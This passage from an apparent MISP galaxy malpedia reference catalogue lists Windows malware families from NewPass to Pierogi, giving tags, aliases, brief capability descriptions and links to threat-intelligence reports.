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<td><a href="https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html">https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html</a></td>
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<tr>
<td><a href="https://securelist.com/cycldek-bridging-the-air-gap/97157/">https://securelist.com/cycldek-bridging-the-air-gap/97157/</a></td>
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<td><a href="https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations">https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations</a></td>
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<td><a href="https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view">https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view</a></td>
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<tr>
<td><a href="https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6">https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6</a></td>
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NewPass

The tag is: `misp-galaxy:malpedia="NewPass"`

NewPass is also known as:

Table 2175. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass">https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass</a></td>
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NewPosThings

The tag is: `misp-galaxy:malpedia="NewPosThings"`
NewPosThings is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings">https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html">https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html</a></td>
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**NewsReels**

The tag is: *misp-galaxy:malpedia*="NewsReels"

NewsReels is also known as:

**Table 2177. Table References**

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**NewCT**

The tag is: *misp-galaxy:malpedia*="NewCT"

NewCT is also known as:

- CT

**Table 2178. Table References**

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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-express">https://www.secureworks.com/research/threat-profiles/bronze-express</a></td>
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**Nexster Bot**

The tag is: *misp-galaxy:malpedia*="Nexster Bot"

Nexster Bot is also known as:
NexusLogger

The tag is: misp-galaxy:malpedia="NexusLogger"

NexusLogger is also known as:

Table 2180. Table References

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<td><a href="https://twitter.com/PhysicalDrive0/status/842853292124360706">https://twitter.com/PhysicalDrive0/status/842853292124360706</a></td>
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Ngioweb (Windows)

The tag is: misp-galaxy:malpedia="Ngioweb (Windows)"

Ngioweb (Windows) is also known as:

- Grobios

Table 2181. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb">https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html">https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html</a></td>
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<td><a href="https://research.checkpoint.com/ramnits-network-proxy-servers/">https://research.checkpoint.com/ramnits-network-proxy-servers/</a></td>
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Nibiru

The tag is: misp-galaxy:malpedia="Nibiru"

Nibiru is also known as:

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nitlove

The tag is: misp-galaxy:malpedia="nitlove"

nitlove is also known as:

Table 2183. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove">https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html">https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html</a></td>
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Nitol

The tag is: misp-galaxy:malpedia="Nitol"

Nitol is also known as:

Table 2184. Table References

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<td><a href="https://en.wikipedia.org/wiki/Nitol_botnet">https://en.wikipedia.org/wiki/Nitol_botnet</a></td>
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<td><a href="https://krebsonsecurity.com/tag/nitol/">https://krebsonsecurity.com/tag/nitol/</a></td>
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NixScare Stealer

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NixScare Stealer is also known as:

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<td><a href="https://twitter.com/3xp0rtblog/status/1302584919592501248">https://twitter.com/3xp0rtblog/status/1302584919592501248</a></td>
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NjRAT

RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim’s camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim’s desktop, perform process, file, and registry manipulations,
and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."

It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.

The tag is: misp-galaxy:malpedia="NjRAT"

NjRAT is also known as:

• Bladabindi

Table 2186. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat">https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat</a></td>
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<td><a href="https://asec.ahnlab.com/1369">https://asec.ahnlab.com/1369</a></td>
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<td><a href="https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks">https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks</a></td>
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<td><a href="https://www.bleepingcomputer.com/news/security/fa...cobalt-strike-deployment/">https://www.bleepingcomputer.com/news/security/fa...cobalt-strike-deployment/</a></td>
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<td><a href="https://blog.nviso.eu/2020/09/01/epic-manche...infostealers/">https://blog.nviso.eu/2020/09/01/epic-manche...infostealers/</a></td>
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<td><a href="https://www.4hou.com/posts/VoPM">https://www.4hou.com/posts/VoPM</a></td>
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<td><a href="https://blogs.360.cn/post/APT-C-44.html">https://blogs.360.cn/post/APT-C-44.html</a></td>
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<td><a href="https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/">https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/copper-fieldstone">https://www.secureworks.com/research/threat-profiles/copper-fieldstone</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control">https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control</a></td>
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<tr>
<td><a href="https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/">https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/</a></td>
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**Nocturnal Stealer**

The tag is: `misp-galaxy:malpedia="Nocturnal Stealer"`

Nocturnal Stealer is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer</a></td>
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</table>

**Nokki**

Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.

The tag is: `misp-galaxy:malpedia="Nokki"`

Nokki is also known as:

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Nozelesn (Decryptor)

The tag is: misp-galaxy:malpedia="Nozelesn (Decryptor)"

Nozelesn (Decryptor) is also known as:

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nRansom

The tag is: misp-galaxy:malpedia="nRansom"

nRansom is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom</a></td>
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<td><a href="https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/">https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/</a></td>
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Numando

The tag is: misp-galaxy:malpedia="Numando"

Numando is also known as:

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NVISOSPIT

The tag is: misp-galaxy:malpedia="NVISOSPIT"

NVISOSPIT is also known as:

Table 2192. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit">https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit</a></td>
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<td><a href="https://twitter.com/r3c0nst/status/1135606944427905025">https://twitter.com/r3c0nst/status/1135606944427905025</a></td>
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Nymaim

The tag is: misp-galaxy:malpedia="Nymaim"

Nymaim is also known as:

- nymain

Table 2193. Table References

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<td><a href="https://bitbucket.org/daniel_plohmann/idapatchwork">https://bitbucket.org/daniel_plohmann/idapatchwork</a></td>
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<td><a href="https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim">https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim</a></td>
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Nymaim2

The tag is: misp-galaxy:malpedia="Nymaim2"

Nymaim2 is also known as:

Table 2194. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2

Oblique RAT

The tag is: misp-galaxy:malpedia="Oblique RAT"

Oblique RAT is also known as:

Table 2195. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat
https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html
https://securelist.com/transparent-tribe-part-2/98233/
https://www.secrss.com/articles/24995
https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

Obscene

The tag is: misp-galaxy:malpedia="Obscene"

Obscene is also known as:

Table 2196. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene
https://habr.com/ru/post/27053/
Oceansalt
The tag is: misp-galaxy:malpedia="Oceansalt"

Oceansalt is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt">https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt</a></td>
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Octopus (Windows)
The tag is: misp-galaxy:malpedia="Octopus (Windows)"

Octopus (Windows) is also known as:

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<td><a href="https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw">https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw</a></td>
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<td><a href="https://isc.sans.edu/diary/26918">https://isc.sans.edu/diary/26918</a></td>
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OddJob
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OddJob is also known as:

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Odinaff
The tag is: misp-galaxy:malpedia="Odinaff"

Odinaff is also known as:

Table 2200. Table References
Okrum

a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.

The tag is: misp-galaxy:malpedia="Okrum"

Okrum is also known as:

Table 2201. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum">https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum</a></td>
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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<tr>
<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/">https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/</a></td>
</tr>
<tr>
<td><a href="https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/">https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/</a></td>
</tr>
</tbody>
</table>

OLDBAIT

According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28. It targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data. In some places it is mistakenly named "Sasfis", which however seems to be a completely different and unrelated malware family.

The tag is: misp-galaxy:malpedia="OLDBAIT"

OLDBAIT is also known as:

- Sasfis

Table 2202. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait">https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait</a></td>
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<td><a href="https://www2.fireeye.com/rs/fireeye/images/rpt-apt28.pdf">https://www2.fireeye.com/rs/fireeye/images/rpt-apt28.pdf</a></td>
</tr>
<tr>
<td><a href="https://www.secjuice.com/fancy-bear-review/">https://www.secjuice.com/fancy-bear-review/</a></td>
</tr>
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</table>
Olympic Destroyer

Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.

The tag is: misp-galaxy:malpedia=“Olympic Destroyer”

Olympic Destroyer is also known as:

- SOURGRAPE

Table 2203. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer">https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer</a></td>
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<td><a href="https://www.lastline.com/labsblog/olympic-destroyer-south-korea/">https://www.lastline.com/labsblog/olympic-destroyer-south-korea/</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=1jgdMY12mI8">https://www.youtube.com/watch?v=1jgdMY12mI8</a></td>
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<td><a href="https://www.lastline.com/labsblog/attrIBUTion-from-russia-with-code/">https://www.lastline.com/labsblog/attrIBUTion-from-russia-with-code/</a></td>
</tr>
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<td><a href="https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/">https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/</a></td>
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<tr>
<td><a href="https://securelist.com/olympic-destroyer-is-still-alive/86169/">https://securelist.com/olympic-destroyer-is-still-alive/86169/</a></td>
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<tr>
<td><a href="https://www.mbsd.jp/blog/20180215.html">https://www.mbsd.jp/blog/20180215.html</a></td>
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<tr>
<td><a href="https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/">https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/</a></td>
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ONHAT

The tag is: misp-galaxy:malpedia="ONHAT"

ONHAT is also known as:

Table 2204. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat
https://docs.google.com/spreadsheets/d/1H9_xaxQHpwaa4O_Son4Gx0YOIlcBWMsdvePFX68EKU/htmlview
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Oni Ransomware

The tag is: misp-galaxy:malpedia="Oni Ransomware"

Oni Ransomware is also known as:

Table 2205. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oni

OnionDuke

OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites.

The tag is: misp-galaxy:malpedia="OnionDuke"

OnionDuke is also known as:

Table 2206. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke
https://blog.f-secure.com/podcast-dukes-apt29/
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/
https://www.secureworks.com/research/threat-profiles/iron-hemlock
OnlinerSpambot

A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.

The tag is: `misp-galaxy:malpedia="OnlinerSpambot"`

OnlinerSpambot is also known as:

- Onliner
- SBot

Table 2207. Table References

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<tr>
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<td><a href="https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/">https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/</a></td>
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<td><a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html</a></td>
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OopsIE

The tag is: `misp-galaxy:malpedia="OopsIE"`

OopsIE is also known as:

Table 2208. Table References

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<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
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<td><a href="https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr">https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr</a></td>
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Opachki

The tag is: `misp-galaxy:malpedia="Opachki"`

Opachki is also known as:
OpGhoul

This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.

The tag is: `misp-galaxy:malpedia="OpGhoul"`

OpGhoul is also known as:

OpBlockBuster

The tag is: `misp-galaxy:malpedia="OpBlockBuster"`

OpBlockBuster is also known as:

ORANGEADE

FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.

The tag is: `misp-galaxy:malpedia="ORANGEADE"`

ORANGEADE is also known as:
Table 2212. Table References

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<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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**OrcaRAT**

OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.

The tag is: `misp-galaxy:malpedia="OrcaRAT"`

OrcaRAT is also known as:

Table 2213. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat">https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-fleetwood">https://www.secureworks.com/research/threat-profiles/bronze-fleetwood</a></td>
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**Orcus RAT**

Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.

The tag is: `misp-galaxy:malpedia="Orcus RAT"`

Orcus RAT is also known as:

- Schnorchel

Table 2214. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat</a></td>
</tr>
<tr>
<td><a href="https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/">https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/</a></td>
</tr>
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</table>
Ordinypt

This malware claims to be a ransomware, but it's actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration).

The tag is: misp-galaxy:malpedia="Ordinypt"

Ordinypt is also known as:

- GermanWiper
- HSDFSDCrypt

Table 2215. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt
https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html
https://www.gdata.de/blog/2017/11/30151-ordinypt

Oski Stealer

The tag is: misp-galaxy:malpedia="Oski Stealer"

Oski Stealer is also known as:
Osno

The tag is: `misp-galaxy:malpedia="Osno"`

Osno is also known as:

- Babax

OutCrypt Ransomware

The tag is: `misp-galaxy:malpedia="OutCrypt Ransomware"`

OutCrypt Ransomware is also known as:

- FACADE

Outlook Backdoor

The tag is: `misp-galaxy:malpedia="Outlook Backdoor"`

Outlook Backdoor is also known as:

- FACADE
Overlay RAT

The tag is: misp-galaxy:malpedia="Overlay RAT"

Overlay RAT is also known as:

Table 2220. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat</a></td>
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<td><a href="https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking">https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking</a></td>
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OvidiyStealer

The tag is: misp-galaxy:malpedia="OvidiyStealer"

OvidiyStealer is also known as:

Table 2221. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer</a></td>
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owaauth

The tag is: misp-galaxy:malpedia="owaauth"

owaauth is also known as:

- luckyowa

Table 2222. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth">https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth</a></td>
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<td><a href="https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/">https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-union">https://www.secureworks.com/research/threat-profiles/bronze-union</a></td>
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Owlproxy

The tag is: misp-galaxy:malpedia="Owlproxy"

Owlproxy is also known as:

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OZH RAT

The tag is: misp-galaxy:malpedia="OZH RAT"

OZH RAT is also known as:

Table 2224. Table References

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<td><a href="https://twitter.com/BushidoToken/status/1266075992679948289">https://twitter.com/BushidoToken/status/1266075992679948289</a></td>
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Ozone RAT

The tag is: misp-galaxy:malpedia="Ozone RAT"

Ozone RAT is also known as:

Table 2225. Table References

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PadCrypt

The tag is: misp-galaxy:malpedia="PadCrypt"

PadCrypt is also known as:

Table 2226. Table References

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paladin

Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.

The tag is: misp-galaxy:malpedia="paladin"

paladin is also known as:

Table 2227. Table References
Links
- https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin

PandaBanker

According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.

This banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.

The baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.

Panda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.

The tag is: misp-galaxy:malpedia="PandaBanker"

PandaBanker is also known as:
- ZeusPanda

Table 2228. Table References
Links
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker
- https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker
- https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/
Paradise Ransomware

The tag is: misp-galaxy:malpedia="Paradise Ransomware"

Paradise Ransomware is also known as:

Table 2229. Table References

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<tr>
<td><a href="https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool">https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool</a></td>
</tr>
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</table>

Parallax RAT

Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous "coronamalware" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.

The tag is: misp-galaxy:malpedia="Parallax RAT"

Parallax RAT is also known as:

- ParallaxRAT
Table 2230. Table References

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<td><a href="https://blog.morphisec.com/parallax-rat-active-status">https://blog.morphisec.com/parallax-rat-active-status</a></td>
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<td><a href="https://twitter.com/malwrhunterteam/status/1227196799997431809">https://twitter.com/malwrhunterteam/status/1227196799997431809</a></td>
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parasite_http

The tag is: `misp-galaxy:malpedia="parasite_http"`

parasite_http is also known as:

Table 2231. Table References

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Passlock Ransomware

The tag is: `misp-galaxy:malpedia="Passlock Ransomware"`

Passlock Ransomware is also known as:

Table 2232. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock">https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com">https://id-ransomware.blogspot.com</a></td>
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Pay2Key

The tag is: `misp-galaxy:malpedia="Pay2Key"`

Pay2Key is also known as:

• Cobalt

Table 2233. Table References

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PEBBLEDASH

The tag is: misp-galaxy:malpedia="PEBBLEDASH"

PEBBLEDASH is also known as:

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<tr>
<td><a href="https://blog.reversinglabs.com/blog/hidden-cobra">https://blog.reversinglabs.com/blog/hidden-cobra</a></td>
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</table>

PeddleCheap

PeddleCheap is a module of the DanderSpritz framework which surface with the "Lost in Translation" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.

The tag is: misp-galaxy:malpedia="PeddleCheap"

PeddleCheap is also known as:

Table 2235. Table References

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<td><a href="https://twitter.com/ESETresearch/status/1258353960781598721">https://twitter.com/ESETresearch/status/1258353960781598721</a></td>
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</table>
Peepy RAT

Peepy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peepy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peepy may be the automated exfiltration of potentially interesting files and keylogs. Once Peepy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.

The tag is: *misp-galaxy:malpedia=*"Peepy RAT"

Peepy RAT is also known as:

*Table 2236. Table References*

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<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat</a></td>
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Pekraut

The tag is: *misp-galaxy:malpedia=*"Pekraut"

Pekraut is also known as:

*Table 2237. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut">https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut</a></td>
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<tr>
<td><a href="https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing">https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing</a></td>
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Penco

The tag is: *misp-galaxy:malpedia=*"Penco"

Penco is also known as:

*Table 2238. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.penco">https://malpedia.caad.fkie.fraunhofer.de/details/win.penco</a></td>
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PetrWrap

The tag is: *misp-galaxy:malpedia=*"PetrWrap"

PetrWrap is also known as:
**Petya**

The tag is: `misp-galaxy:malpedia="Petya"`

Petya is also known as:

**pgift**

Information gathering and downloading tool used to deliver second stage malware to the infected system

The tag is: `misp-galaxy:malpedia="pgift"`

pgift is also known as:

- ReRol
PhanDoor

The tag is: `misp-galaxy:malpedia="PhanDoor"`

PhanDoor is also known as:

Table 2242. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor</a></td>
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</table>

AhnLab Andariel_a_Subgroup_of_Lazarus%20(3).pdf

Philadephia Ransom

The tag is: `misp-galaxy:malpedia="Philadephia Ransom"`

Philadephia Ransom is also known as:

Table 2243. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
<tr>
<td><a href="https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/">https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/</a></td>
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Phobos Ransomware

The tag is: `misp-galaxy:malpedia="Phobos Ransomware"`

Phobos Ransomware is also known as:

Table 2244. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos">https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos</a></td>
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</table>
Phoenix Keylogger

Keylogger, information stealer.

The tag is: misp-galaxy:malpedia="Phoenix Keylogger"

Phoenix Keylogger is also known as:

Table 2245. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger

PHOREAL

Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53

The tag is: misp-galaxy:malpedia="PHOREAL"

PHOREAL is also known as:

• Rizzo

Table 2246. Table References

Links
Phorpiex

Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

The tag is: misp-galaxy:malpedia="Phorpiex"

Phorpiex is also known as:

- Trik

*Table 2247. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex">https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex</a></td>
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<td><a href="https://research.checkpoint.com/2019/phorpiex-breakdown/">https://research.checkpoint.com/2019/phorpiex-breakdown/</a></td>
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<td><a href="https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/">https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/</a></td>
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<td><a href="https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/">https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/</a></td>
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<tr>
<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://www.johannesbader.ch/2016/02/phorpiex/">https://www.johannesbader.ch/2016/02/phorpiex/</a></td>
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<tr>
<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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</tbody>
</table>
**PICKPOCKET**

PICKPOCKET is a credential theft tool that dumps the user’s website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.

The tag is: `misp-galaxy:malpedia="PICKPOCKET"`

**PICKPOCKET is also known as:**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket">https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket</a></td>
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**Pierogi**

The tag is: `misp-galaxy:malpedia="Pierogi"`

**Pierogi is also known as:**

